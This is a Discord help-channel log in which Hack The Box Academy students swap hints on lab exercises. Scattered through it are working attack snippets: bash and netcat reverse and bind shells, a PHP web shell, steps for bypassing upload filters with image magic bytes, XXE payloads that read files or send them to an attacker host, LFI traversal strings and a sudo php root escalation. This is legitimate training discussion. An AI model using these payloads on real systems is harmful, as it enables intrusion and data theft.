thank you i send it for you

Module "three"
https://app.hackthebox.com/87d9fb98-300d-46d5-8f54-6eded3650380
so I managed to reach the shell page but it's not just that, my bash cmd doesn't work

bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/1337 0>&1

that isn't a module

└──╼ [★]$ bash -i >& /dev/tcp/10.10.14.44/1337 0>&1
bash: connect: Connection refused
bash: /dev/tcp/10.10.14.44/1337: Connection refused
is get hit with this error

I'm in labs teir 1

it's a box ask this at #starting-point

ohh okay

this is no such channel here lol

use ++verify at #bot-commands

ohh okay thank you

with the awesomeness of @vital adder for helping me through the problem

any hints for local file inclusion fot the question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

You have to use multiple filter bypass methods in one command

yes...tried a view things...no succes till now.. would you mind to give a more specific hint via dm?

hello, anyone who can share a hint about the sqli HTB API..!!!

Hi !

I am on Pass the Ticket (PtT) from Linux
Question : Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.

I managed to import the good kerberos tickets and access the specified share and retrieve the flag. But it's marked as incorrect.

Does someone has the same issue ?

someone ? https://discord.com/channels/473760315293696010/1035924177309421679

Can you try this please, to see if this is only an issue for me

Is that the correct way to write out the PORT address? it should be IP:PORT

Sure dm me

I get an error’ “ERROR kuhl_m_sekurlsa_aquireLSA ; Handle on memory (0x000000005)”’

this doesn't look like an privilege issue so i'm not sure if this going to help but did you run this before that?
privilege::debug
token::elevate

Where did token:: elevate come from? I have not come across that in my research

i think i learn that from some stuff on tryhackme

That was the difference

so did it work?

Yeah after doing token::elevate

oh

Hi everyone, question about Shells&Payloads module, PHP shell section - I've uploaded the shell file as described in the section, and can see the vendor/icon. However specified path /images/vendor/connect.php is not existing. Should I modify anything in the shell file?

Not the strangest issue I have run into but still

oh wait i just double check i think the mimikatz command i send use isn't in the section either

No it’s not but I had found it on Google while researching the answer

But everyone I tried I got that error so I kept searching lol

Nvm, found the issue

}Can someone explain if additional steps are needed to connect to some of the Fortresses modules? I'm interested in connecting to the AWS lab ... Those are designed for companies that want to host them. But I don't quite know how it works and AWS should be done using the AWS servers yet hackthebox is telling us to use their standard openvpn connection...

in this a htb academy module?

anyone free for a nudge on AD Enum & Attack Assessment2?

hey guys
local file inclusion modul, section ¨basic bypass question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

the hint is: ||Try to see what path the regular functionality uses|| do I need to use ffuf for this?

i'm kind a lost here.. i know htb likes to make you feel like you have to put your head through a wall to learn something...but i would apreciate some help... 😉

somebody knows if that is in the near of the right solution?

||./language....//....//....//....//....//....//flag.txt%00||

or that:||language=languages....//....//....//....//....//....//....//....//flag.txt%00||

footprinting - lab easy

What I found until now:
* useful information in hint
* two file transfer services running on server
* ssh on server requires key authentication
The problem:
* i can interact with the file transfer services
but are totally empty. I don't know how to move from here

Any help will be really appreciated

Hey everyone, I’m having issues receiving the credentials for rdp in the remote password attacks -Network Services. I have attempted hydra with the lists provided in the module but always get 2 server scans could not be completed error messages. Any nudges on what I am doing wrong would be greatly appreciated!

Don't change the command from the module. You altered the dc. Keep it the same and make sure to do it from the attack machine they give you ssh access to.'

help on whitelist filters ||filename="shell.php\x00.jpg|| shows successfully uploaded but navigating to http://1.2.3.4:12345/profile_images/shell.php\x00.jpg?cmd=id|| gives Not Found Error. Used ||yoyi as magic number and <?php system($_GET['cmd']); ?> as code||

Did u b64 encoded it ?

would you mind a DM? seems like i can only insert pics in DM not here

i do have some error in my note but not the one you are having so i don't know about that one but try restarting the target machine and for the username list first login to the target machine with previous cred and use the any un-user username as your list

hint check the hint and use the stuff in there to login to one of ||ftp service|| that you foun

hint this one is almost right

hello

hi sorry for leaving you hanging with some AD question the last few time (i didn't do that AD module) but i just finish this one and if you still need help you can use that example command but you just need to change the -Filter tag to *

hey man thanks i have managed to finish the module already cheers

oh congratz

thanks, is a nice module tho

a query, I'm doing my academy and some information seems to be outdated, because I try to apply them in the exercise and they don't work, an example would be in "module FILE INCLUSION, theme PHP Filters, The steps in the tutorial do not work"

You probably should message a mod or staff member, this is a help channel for the Academy platform and I doubt the correct place for such a request

Ah really sorry.

I saw many errors in several courses at the academy, which does not allow me to advance

Really? I haven't come across any yet. Albeit I'm not that far along, what path or module are you on?

They have an 'erratum' channel that corrects minor errors. On the left panel just below this channel

actually it is in the beginning, I thought it was my mistake, but I saw on youtube how others did the same step as me and if it worked for them, and I saw in the comments that several have that error

What is the error? On which module?

Maybe someone here could help

this module for example, I follow the steps, it is supposed to show me an error message on the page or a message, but the page does not throw me results, and there I am stuck

after doing /etc/passwd

I send you a screenshot as soon as I turn on my PC

That module is more than half way through the Pen Tester path, which is farther than I've got - so unfortunately I won't be able to help but I'm sure someone here will.

I am also new, that module is basic, you will surely get it

this is an exercise in academia

sorry, the person deleted their message - this was not directed at you. They were asking to be made a Mod. apologies

ok, tk

Does any of the buffer overflow modules go into heap exploitation?

Thanks for the answer. One of the commands in the cheat sheet did the trick

ØØØØØØØØØØØØØØØØØØØØ

Hello @everyone

Hey All! I'm completely stuck on the following question, in the footprinting module: Enumerate the SMTP service even further and find the username that exists on the system. I have used nmap, metasploit, and smtp-user-enum all to no avail. I've logged in and poked around but I'm quite stuck. Other than trying another wordlist, which I tried a couple of iterations, I have no clue. What's more frustrating is that I've finished everything in the footprinting module (including the hard labs), and realized I had missed this single module. Assistance and pointers would be greatly appreciated!

@spice onyx have you used a wordlist with smtp-user-enum?

oh my gawd

You mentioned you used wordlists but not if it was the provided one

I totally missed that download - I was searching for others

Thanks so much. I'll run with that and try

Should be a breeze now

careful with spoilers pls

It still doesn't seem to find anything with smtp-enum. Running in verbose, and changing the timing too. I can see it's running through all the names...

@spice onyx smtp-enum?

smtp-user-enum

I can see it's running through all 102 queries but no result

Have you read about the -w flag?

hmm I'm guessing no, but it just found it with metasploit and same list

🙂

I'll go try it with that as well, I was changing the timing but obviously I missed an option

Thanks so much - it was very annoying to only have this outstanding for the entire module! 🙂

Is there a reason why crackmapexec is able to brute force smb on my target but when I use hydra it coes back with an invalid reply from target?

Thank you so much @vital adder ! I didn’t realize we had to do some post exploitation enumeration here. I will keep this in mind to enumerate future machines for credentials moving forward 🙂

Hey all, I’m having issues on “Reverse Shell & Payloads” section in “The Live Engagement” module. I can’t login into the skills-foothold via NoMachine RDP. I’m inputting the password “HTB_@cademy_stdnt!” As stated in the module. Is this the incorrect password or am I suppose to find the password for the Foothold machine? Any help would be much appreciated! 🙂

@magic valve it's a keyboard issue. Use the onscreen keyboard when you are trying to login when the terminal pops up after connecting through nomachine.

The onscreen keyboard should be top right of the terminal screen that pops up after logging in via RDP

nah not at all imo. Learning to google information is a great skill since noone remembers everything.

Hi there! Is anyone doing the sqlmal skills assessment module?

I'm stuck trying to find the vulnerable parameter I already tried manually so I can use it with sqlmap

FILE INCLUSION/ PHP Filters :
help I get this command to apply it in the exercise but it doesn't work :c
http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=config

I get blank, or do I have to find the way myself? :C

Did you try fuzzing for php scripts like the question asks you to? That should turn up some stuff to help you out

Almost all the example commands need to be modified for the exercise questions

If you're following one of the job role paths, I recommend doing the modules in order because they build on each other

yes, I do the whole module in order

I'll keep looking how to fix it. :/

The cheat sheets are useful on the modules too. There is a fuzzing section in the cheat sheet on this one if you want a refresher on what the question is asking for.

i did all those, Does everything work fine for you? Or do you still not have that module?

because my doubt now is, if that only happens to me, or to others too

I just went back and did it again, it still works for me

Modul: Footprinting
Section: SMTP
HTB Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

I've tried to use:
sudo nmap <IP> -p25 --script smtp-enum-users -v
msfocnsole: smtp_enum

I haven't found anything. I see the hint says there's a footprinting wordlist that I may be overlooking which could solve this. Am I missing something or is the list in some obscure location?

can you help me private? , I can't send image here

Hey there, looking for a little help in Password Attacks - Pass the Ticket (PtT) from Linux. The last required question reads: Use the LINUX01$ Kerberos ticket to read the flag found in \DC01\linux01. Having trouble with locating the ticket

Nvm, I'm dumber than a bag of rocks.

@west canopy Thank you! ... re your helpful Aug 5, 2022 reply on determining OS from NMAP output.

Hi guys ... How to convert Decimal number to RID for the active directory user

Try enumerating anything you can’t get an axfr response from.

DM me if you're still stuck.

Hello,
I'm bloqued at "Broken Authentication"->"Predictable Reset Token", can you help me in dm please.
I was set the timezone, convert the timestamp in millisecond(x*1000), concat the htbadmin string with the timestamp before the md5() function

Could anybody help out in Password Attacks - Pass the Ticket (PtT) from Linux category? I am stuck on the last section

hello guys i have a question, why i cant unlock the sql inyection module ?, i click it but nothing happends

Doing the File Inclusion Module: Basic Bypass. I have the flag displayed but it says it's incorrect. :C

Apparently the website inserted a space that I didn't see between the last character and the bracket...

I’m working on attacking Web Applications with FUFF and on the DNS records it talks about modifying the /etc/hosts with the command sudo sh -c ‘echo “SERVER_IP academy.htb” >> /etc/hosts’ . I was wondering if anyone could explain why this is necessary in more detail and could I mess up my kali machine doing this?

yes i have points

the cost is 10

and i have 36 i thing

[The Live Engagement] - [Issues interacting with Targets]
I was able to spawn the foothold server and I also could get into the spawned server but when I try to even ping from inside it to the targets ips it is not responding.
Checking the /etc/hosts the targets are already there:
||172.16.1.11 status.inlanefreight.local
172.16.1.12 blog.inlanefreight.local
10.129.201.134 lab.inlanefreight.local
||

Any tips ? 🙂 Thx!

You might want to check iptables to see the set of rules (chains) - there might be something about ICMP (ping) !

Even cleaning up the rules, it still doesnt work. I do think I'm missing something here. Other modules which I had to manually add the entries to /etc/hosts I had no issues like now.

Hello, quick question on the network services part of password attacks: am I really supposed to run crackmapexec through the user and pwd lists provided in the resources? Seems like a tremendous waste of time so I was wondering if there is another, smarter way of approaching the problem

@pliant sage what is the problem

well the user and password lists are fairly long, and I have to repeat the process for 4 different services so it feels like it's going to take a whole lot of time

since it's just one section of one module I thought maybe there was an easier way of doing it

ok I have a new problem, in smbclient the command "ls" returns the following:NT_STATUS_NO_SUCH_FILE listing *

does anyone have a solution?

nvm figured it out

Can somebody help me on file uploads skill assesment ?
I can't find a payload that works
My current payload gives me a 500 internal server error
Is that a step forward ?

@flint agate Have you looked at https://www.revshells.com/

Thanks
But actually my problem is that I don't know how to upload the file

I haven't done that specific module... Thought you just needed the shell

could be useful

I guess I can do it today.. I usually just use scp or http.server

But that implies ssh access 😅

Hi this Channel is about Hacking Right?

@burnt bronze This channel is for the modules of the academy

The thing is you need to use ||double extension|| and ||mime types|| but it is a lot of guessing I think
I don't really know when I am right or wrong

@flint agate what is the name of the module you're doing?

Skills Assessment - File Upload Attacks
https://academy.hackthebox.com/module/136/section/1310

if you found the upload directory and the remaining then this is the last step and for the internal server error issue i think that's because of your payload

try <?php system('your command here'); ?>

will do

I used this so far on every exercise

so did it work? also what extensions and magic number are you using?

now I am trying to upload it
I got another question the magic number for ||"jpg"|| is ÿØÿà␀␐JFIF␀␁ or ÿØÿà beacuse I used the shorter one

I tried to fuzz but it dosen't work

just ÿØÿà

also here use this and pls don't use any wiki page https://gist.github.com/leommoore/f9e57ba2aa4bf197ebc5

I tried|| shell.phar%00.jpg|| and jpeg also but failed

wait try just remove the %00 thing

for all of the section in this module i didn't have to use anything weird naming thing like this

that was character injection

I think I might have an idea now after I saw this github

I tried to but magic numbers inside the php file but i seams that it dosen't work either

if you are on linux and run file with your payload it should that payload an images or something like that if you put the magic number on the right way

oh here something like this

it gives me ASCII text

tried a bunch of combinations

and how did you put the magic number in?

At the first line before the payload, I used mousepad

this are the numbers right|| ff d8 ff e0|| ?

wait so you add that number to the first line??

yes

nope that isn't how you put magic number in

i have this pre-written down but i can't find it so give me a sec

I looks like that in your example

oh here found it

1. make a txt payload on top add AAAA
2. open that txt file in a hex editor
3. in the hex editor change the value of (41 41 41 41) to (FF D8 FF E0)
4. save and change the extension from .txt to .phar.jpg

wait which one?

this one

no that's the end result after adding the magic number

WOW

It worked

I used an online hex editor

but that was mind blowing 😱

I hope I can finish the assesment now 🫡

Ghex is a nice app to get familiar with, then when your happy, use one of the many terminal apps.

can't you find the directory using ||dirbuster|| ?

if you use a wordlist that have the right directory name then yes

I know the upload directory from the comments in the chat history but how did you find it ?

where did you find this ?

Wait the first thing you need to do is ||read the source code with xxe||

the source code of ||/contact|| ? or|| /|| ?

I used the XXE of the previous exercise

at /

This should do it
||<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/"> ]>
<svg>&xxe;</svg>||
but do I need to change the file I upload again ?
I mean change the file to a svg and put the magic numbers again ?

hint no you don't need to ||magic number|| or the ||.svg|| for this also the source is at the web root not the linux web root

should I look for files like /conf or /root

nope it at the web root

I have no idea what you mean.
Is it|| #|| or a file ?

shoot me dm i'll send you the payload

Hey guys I need a hint for Web Attacks - Blind Data Exfiltration. I am can't seem to get a request with the contents of the file. I do get a request, but it doesn't have the content.

Edit: solved

Hint: ||make sure to reference the correct entity in your payload, even if it looks wrong||

for the payload you ||<root>&content;</root>|| at the end also the need the index.php file but that is for decoding so if you can't get any call back at all then i think it's the first one

Works now! Thank you. Could you explain why it works with ||&content;||, since it's not defined anywhere as an entity?

all i have in my note is remember to use it 🤣

oh wait in the did file thing have ENTITY content so my guess it have something to do with that maybe?

Ye, it is in ||<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">||, but it's not itself an entity. I changed it because I figured the one in the lesson is just an example and we have to figure out the correct one

XML be weird

#1035976205842780170

Verify you account then head over to #1035976205842780170

Hi guys, I need some help with the Web Attacks Skills Assessment. I am trying to ||change another user's password||, but I am getting Access Denied

Edit: solved

hint it isn't ||POST|| also pls put that token into spoiler tag

Works. Thank you!

hi guy, any hint for Active Directory LDAP - Skills Assessment question 3?

hello, once rdp into the foothold machine how long does it usually take for the infrastructure to come up and become available? I've tried to ping the other machines but none of them seem to be up, not sure if I'm doing something wrong. Thank you

Hi

Has anyone been able to do File Inclusion Skills Assessment, I feel like the '&cmd=pwd' poisoning should work, but It's not, and I'm not sure If i'm able to edit the nqinx files

if you use single quote for the payload then that should work

Hey I need some help for the Login Brute Forcing module. I'm at the skills assessment website and I don't understand the hint.

It says You may reuse the username you found earlier. Make sure you got the correct fail string and parameters. But wich username are they talking about ? I've try both usernames from last exercices ||m.gates and b.gates|| and I found nothing

This is what I'm trying to inject, and it doesn't seem to like my cmd attempts:

that hint basically mean you can re-use the username from question 1 also the your hydra give some false positive or took too long when there is something wrong most likely the fail string hence the second part in the hint

that's the right payload and if you are poisoning ||nginx || log and still get nothing then you should restart the target

I've try it with the user from the first question and still havent found anything

I keep getting empty responses even though I've restarted, and If I try to let's say just put a single word there It will work, but with CMD it does not

can i dm you ?

sure

oh wait if you get completely empty responses then there is a chance the target machine crashed

It's a bit messy as I try to keep it spoiler free, but here is when I try with just normal word:

yea... you shouldn't do that because if you inject that the log system can't processes then the system or nginx will crash

Ahh, I'll try straight up cmd inject, thanks!

also recommend greenshot for taking and censoring screenshot on window

Is there an admin that could help me with an issue regarding a module? There is definitely an issue with the lab that makes it impossible to solve

This is regarding the The Live Engagement section of the Shells & Payloads module. The foothold is unable to reach the targets. The corresponding network interface is missing..

Got it thanks, that was really unpleasant, had to completely destroy the target and remake it after every command, thanks for the help!

if someone can help with Limited File Uploads section of File Upload Attacks. says file uploaded successfully. but the output shows "This XML file does not appear to have any style information associated with it. The document tree is shown below. " and all i see below is <svg/>

Can anyone help me out with Attacking common services SMB? I keep downloading an empty file and bruteforcing creds aren't working with the provided wordlist

same. Foothold is unable to ping targets.

So i'm stuck again for the login brute forcing module first question in Skills Assessment - Service Login As you now have the name of an employee, try to gather basic information about them, and generate a custom password wordlist that meets the password policy. Also use 'usernameGenerator' to generate potential usernames for the employee. Finally, try to brute force the SSH server shown above to get the flag.

So I'm not sure what to use for the username for the password I created a list with cupp -i.

Good evening from Spain! anyone have solved the Active Subdomain enumeration module?! Been stuck for a while 😦

@rustic sage what is the problem

Ive been trying with dig, nslookup but dont get much back... I added the IP to my etc/hosts file but still I get the "server can`t find" error

@rustic sage did u brute force subdomain

I`m downloading wordlists to use with gobuster

Any help would be appreciated 🙂

Hi together, I join the asking club...
in the local file inclusion modul at the section php wrappers is this command:
curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

to currl the php configurations...when i curl i'm able to curl the page but i see nowhere the base64 encoded configruations code like in the exmaple...

anybody knows why?

Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.

Can someone help with this on the Active DIr Living off the Land mod

https://academy.hackthebox.com/module/143/section/1360

Hey has anybody completed the newly updated sections added to Password Attacks?

need help with file uploads skills assessment. anyone available that i can dm to provide what i have so far?

@north ermine Is it okay if I pm you regarding some of the previous questions you have asked?

Need Help File Uploads Skills Assessment. I am able to upload files according to Burp. I found the source code also. Just dont know how to read the source code to figure out how to finish the task (where is the file located)

can someone please explain this command in details:
i know it shifts characters to produce a '/' however i do not understand how it works and i cant reuse it to shift new characters
echo $(tr '!-}' '"-~'<<<[);

Can someone point me in the right direction for Password Attacks - Credential Hunting in Linux. || I used the hint and found I could list the shares of the ftp server with the hint u/pswd but I dont know where to go from here. Are we supposed to just brute force will? ||

What are you guys thoughts on the questions on HTB ACADEMY ? Sometimes I get really confusing trying to understand them ( some of them of course)

Follow the motto Try Harder, google is your friend and personal research is required for id say about 60% of the questions

Also this Discord is a godsend

Could someone help me on Password Attacks Credential hunting? || I've tried running a password mutation on the suggested password and brute forcing but I still cant get in. Can someone point me in the right direction? ||

@sterile hawk

ty

yw

What HellsCrypt said. I really get angry at some of the modules because they desperately need a rewrite, but overall the academy will give you a solid foundation to work on

module -password attacks, section- pass the hash , question "Using David's hash, perform a Pass the Hash attack to connect to the shared folder \DC01\david and read the file david.txt." I found davids hash but not sure what tools or commands syntax im supposed to use to be able to access the share. Tried some commands from various online tutorials but none of them are working or giving errors. Anyone know what tool you need to use?

THINK I had to connect directly to the lab from my machine directly, no vm, firewall, or vpn. Only way I could get it to work

Linux or windows credential hunting?

Linux

did you find kira credentials?

|| Just what's given from the hint, I tried brute forcing and mutating that password. But I don't have a clue. ||

you do need to create a mutated password list using the given password and the given mutated rules.

Did exactly that

then buteforce with her username and the mutated list with hydra

ssh service

Yup tried that x)

DM me

just guessing but think you may have made an error when making the mutated list

Did you already complete the questions about david in that section? I found his hash what tool are you supposed to use to pass a hash to access a share?

What module name and section you working on?

Module name: Shells&Payloads

Section name: Bind Shell

Question: SSH to the target, create a bind shell, then use netcat to connect to the target using the bind shell you set up. When you have completed the exercise, submit the contents of the flag.txt file located at /customscripts.

Problem: I use bind shell to connect to both machine together, but i wait for a while and this is all i have, what is my problem?

I'm currently having the same issue. Please let me know if you speak with anyone that can help

How can I see the operating system?
nmap --script smb-os-discovery.nse -p445 10.10.10.40

I found this other one but it doesn't work either

sudo nmap -sU -sS --script smb-os-discovery.nse -p U:137,T:139

@chilly nymph use -O

okay ty ñ.ñ

Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: CEO-PC
| NetBIOS computer name: CEO-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-12-27T00:59:46+00:00

Why doesn't the result come out like the tutorial? version change?

@chilly nymph Because everything changes

xd, ah okay ñ.ñ thanks

@chilly nymph np

@wide river the problem is that, that is not a blind shell because netcat has no e option

Hi, is the SG vpn server down? I can't download the configuration file

What’s the best channel for support? Trying to do the Shells & Payloads module, but the boxes are down

Good morning from Spain!!

use mimikatz to get a cmd with that hash and then just read the file "type \dc01\david\david.txt". Remember that it has a double forward slash before "dc01"

Someone with a little hint in the information gathering web skills assesment!

Again can someone help with question 3? https://academy.hackthebox.com/module/143/section/1360

I`ve been stuck for a while with this one: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? Any hints appreciated 🙂

Please see your DMs for instructions on how to verify your HTB account.

Hi trying Attacking Common Services - Hard, couldn't figure out how to impersonate as another user? any pointers? ( I have found the linked server, in mssql studio as f****** but don't know what to do from here ) Solved it, but how are we actually supposed to find which user we can impersonate, that part for me was pure guesswork.

for anyone else who is stuck, once you have a rdp session you don't need to try different usernames and password combinations.

can anyone give me a nudge on login brute forcing - skills assessment - website?

can't seem to find the right lists to use with hydra

module/115/section/1139
Shells & payloads // The Live Engagement

I can't seem to get nomachine running on port 4000 or 3389 so I can't even start with the challenge

You shouldnt need to use Nomachine any longer. You can use xfreerdp to connect to the jump host now. It is better performing than Nomachine.

It's what I did

Just sad that nomachine is not working

Nomachine was recently removed from that target due to continuous performance issues.

Oh 😦

Did you like Nomachine?

I just wanted to see how it worked

Never used it before 😁

Can someone give me a pointer on the machines? I seem unable to ping any of the machines from the foothold machine

there is a lot of people having the same issue of the target machine down for the The Live Engagement right now and did check and that seem to be the case

i think they remove the lab with the nomachine replace it with an older lab or something

So I'm supposed to just wait for a fix from their side?

this isn't the first time thing like this happen but for this i think yep

🤔

also it seem like 2 out of 3 target is down but the third target network have some new ip that i don't think i did saw before (i don't have this part in my note so i'm not 100%) i didn't enum much with any of those ip but it could the domain in the hosts file get set to the wrong ip in this older lab
edit: nvm i think there an networking or something and new NoMachine is missing the tun0 interface "172.16.1.5" also i don't think the PRTG Network Monitor (APP03) i found is one of the target

Have you tried spawning that challenge from another VPN?

hi

like the hint said re-check if you got the right fail string and parameters if that doesn't help shoot me a dm if you still need help with that

rgr

thanks

Ay guys how you doing
I've been stuck for the past couple of days on the second task of "knowledge check" section in the "Getting Started" module. The hint says try running linenum or linpeas but I can't download them on the machine as I have almost no permissions on it. Any hints/help?

@dense sonnet use wget

tried it, I don't have permission to write any files.

tried to wget from my local machine and from the internet, permission denied.

@dense sonnet try to use sudo -l

yea i tried it too it just shows that I can use /usr/bin/php without a password

@dense sonnet php may lead to privileges escalation

isn't /usr/bin/php just a directory?

when I click enter to run the command it just keeps going one line down without doing anything

@dense sonnet use CMD="/bin/sh"
sudo php -r "system('$CMD');"

Hi guys, I need some help with attacking common applications - joomla discovery and enumeration. I am trying to brute-force the admin user password at http://app.inlanefreight.local/<SPOILER>, but the script shown in the lesson takes forever (doesn't seem to work)

Edit: solved. I was using the wrong wordlist.

Hint: ||use the same wordlist as shown in the lesson||

Hi, I am just at the skills assesment, but I do not have answers to some questions, it may be strange, but the questions for me are vague

Windows Privilege Escalation =>
Initial Enumeration =>
=> What non-default privilege does the htb-student user have?

=> Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?

thank you 🙂

Any admin for The Live Engagement on shells&payloads? the network seems down, at least from what i can tell..if someone can check that and let me know..thank you

hello

i need help

Just ask and explain your issue with some details that should include module and screenshots if possible.

just started what is the ans of last question of MEOW(Submit root flag)

So these are not modules these are starting point boxes

So best place in future to ask is #starting-point

ok

But you need to log on to the machine and get the flag

ok

Think about the port you found with nmap and what tool you would use to access it.

#welcome

It does the same as if I run sudo /usr/bin/php

just gives me nothing and lets me go down lines

https://academy.hackthebox.com/module/116/section/1173

Can someone tell me

how to get the flag in this

i got the username and password

authentication also done

but how to read emails in smtp

Access the email account using the user credentials that you discovered and submit the flag in the email as your answer.

THis is the question

which email are they talking about?

Solved. With a small changes it worked... but only in pwnbox.

You can't read email with SMTP. Check out some of the other email protocols mentioned in the lesson

yeah

imap and pop3 i can use

i learnt that

didnt see commands to read in nmap so stopped

will check again

thanks

yw

:< i feel sad, my connection got lost after completing the Meow stage

Hello from Spain!

I`m looking for some hints with the 3rd question of the web skills assesment! the "servers name" of i.igmur :/ :/

Can you PM the folder? I'm too lazy to go through 100 folder manually, this isn't hacking lol

@rustic sage use brup suite

Ok Crean, I`m on my way!

@warm sand Did you manage to progress with Shells & Payloads?

I'm stuck unable to ping even the first host

Im in burp suite but the browser doesnt open the i.igmur.com... and the scan gives me back little information

@rustic sage if it is not working use curl

Ive tried curl with the i.igmur and the relocated name but I dont see the servers name... for what Ive read in the forums Im not understanding the questions...

@rustic sage use curl -i

I have used -i and -I and nslookup and dig commands...

hint you can use the one in the example

I ended up using https://github.com/Nekmo/dirhunt

nope, nothing

I'm waiting on support now for an answer

hint the question need the "server name" so if you use curl with -I check the output and find the server tag and submit that name

oh try refresh the page if you got nothing back from support for a while also the nomachine is missing an network interface (tun0 / 172.16.1.5) and 2 out of 3 target machine is on 172.16.1.0/23 so i think that's why the nomachine can't access the target

I can see the Server: Apache/2.4.38 (Debian) but that`s not the correct answer 😦

Has anybody finished up the last newly added sections for Password Attacks - Pass the Ticket: Linux?

how tf did you get that? i don't think it is even running apache also the imgur is currently down this is what i got when i go to page Imgur is temporarily over capacity. Please try again later so i don't even know how did you get what service a website is running when the website it self isn't even up

yep i did also what's the issue?

I thought it was kind of weird that I didn`t get anything back when I typed on my browser...

i just try and you can still get the right answer

shoot me a dm with your command

@vital adder Tried to find tun0 but no success and I've been in queue for support 18 minutes so far

oh the refresh thing is just to see if you got new message or not and yes tun0 is missing on the nomachine

I been stuck on hacking wordpress login section if somebody could point me in the right direction

https://academy.hackthebox.com/module/17/section/90

I was able to find the ||keytab file within /etc/krb5.keytab|| and tried impersonating that user to log in via smb but had no luck with it. Am I expected to crack the NTLM hash? Also tried kinit but it said something along the lines of lack of credentials within the keytab file

no but after impersonating using that ||keytab|| file what command did you try to get the flag

I could do the curl req to see things but when i try the curl -X -d POST request it gives a 403 access denied or sm and im not sure if i need to find credentials to enter in the -d data section of curl am i on the right track?

The File wasn't working for impersonating that user. Do I need to keep trying all of the options which get listed when I run klist -k -t?

Thanks!!!!!! found it!!!

oh you just need to use the kinit tool with -k -t for the impersonating part

also here is the format for this kinit (username) -k -t ||keytab file||

nice

do some re-search about "WordPress xmlrpc attacks" on google also a hint for this is you don't need any cred and you can do this in curl but some of the example on google do it in burp

The error I've been getting was "Keytab contains no suitable keys for ......"

Thank you! Ya that’s what was weird for me I haven’t used burp yet but Google results included a lotta burp

i remmber that error but i don't have that error in my note shoot me a dm with your command

WIll do thanks

Hi

@sand mauve hei

e option on target machine or my machine ?

hey guys im struggel with the passwort attack task: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the SSH password for the user "sam". Once successful, log in and submit the contents of the flag.txt file as your answer.

@wide river target

used multiple rules list with the user sam but nothing works

@leaden quail what is the problem

brute forcing for hours with hydra... seems im doing something wrong

but i follow the instructuions

so it is gonna be
nc -lnvpe [ip] [port] ?

@wide river nc <attacker-ip> <port> -e /bin/bash

rm -f /tmp/b; mkfifo /tmp/b; /bin/sh -i 2>&1 0</tmp/b | nc $YOURIP $PORT 1>/tmp/b

is that for me ?

😊

so i use that code for target machine or my machine ?

That on the target machine

and nc -lvnp port on your machine

oh wait..

lemme do that again

Haha

the 10.10.14.61 443 is my machine

am i do it correctly?

You made 2 tiny mistakes

In the first command you specify 430 and you're listening on 443 on the other machine

And you're writing it as two command while you have to pipe them

Are you getting a shell or not?

Does whoami give you an output?

im redoing it again..

and..

this is where im at right now

and typing command dont return anything

Ok

So you want to run a listener on your hades machine

which is nc -lvnp port

And then you try to get the htb-student machine to conect to it via a command

so the bind shell suppose to have listener on my hades machine ?

Oh bind shell

nc -lvnp port -e /bin/bash

on my hades machine ?

listener should be on the target machine if you want a bind shell

And you already ran the command in the module?

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc -l IP PORT > /tmp/f```

with that command

the IP and the PORT is for the target or my machine

@wide river use nc ip address port -e /bin/bash on the target and use nc -lvnp ip address port on ur local machine

can i inbox you?

@wide river yes

somebody did the shells and payload skill assesment ? For me its completely broken with freerdp. Its hella slow, and the internal ips are not working

@zealous belfry Bunch of people have this issue, apparently the tun0 adapter from the machine is gone

I'm trying to chat with support but I've been in queue for 1h so far

aw yikes..

before they used nomachine which was a pain as well..

someone help me out with hacking wordpress? Search for "WordPress xmlrpc attacks" and find out how to use it to execute all method calls. Enter the number of possible method calls of your target as the answer. maybe can send me a url to something that helps explain wordpress xmlrpc attacks?

is this for the getting started section ?

Any clues for the "getting started" privilege escalation. switching from user1 to user2. Ran linpeass and tried dirtycow and dirtypipe neither worked due to glibc not being found.
I feel like its easier cause its in the getting started section but Im not seeing it any help is appreciated

Hello! for the AD Enumeration skill assessment I can i get some help on how to get the cleartext credentials for another domain user? Thank you.

its for hacking wordpress section but i havent finished that one yet either

I used wpscan and then msfconsole had a great module for it

just dont forget the port and uri for msf

Hi, for AD LDAP "Credentialed LDAP Enumeration", does anyone know how to authenticate to the IP? Im getting this screen when I try to RDP:

@charred pawn what is the problem

not sure how to list all possible method calls using curl post

The hint will tell you. If you don't understand the hint, you can google info about the hint

I wish

im trying curl -s -X POST -d "<methodCall><methodName>'system.listMethods'

You can DM me if you're still stuck

This Firewall and IDS/IPS Evasion (hard) module is driving me insane

I found the tcpwrapped service on port 50000. I can't figure out the version.

It shows either tcpwrapped or ibm-db

hey, I am new here, is this the right channel to ask question about "Starting Point boxes"?

Hi @bleak compass, I run into the same issue... password is not working ... did you work it out somehow?

Same here... The three hosts seem unreachable.

You tagged the wrong person lol

damn sorry...

ya guess we'll have to wait until something more practical comes around 😄

for some reason i cant spawn a module'

it say i already have one open

and i dont know how to see the one that is open

You doing academy or #starting-point ?

academy

I’m not sure then. I’ve never seen that issue with Academy

ok

should i just make an new account?

and start over

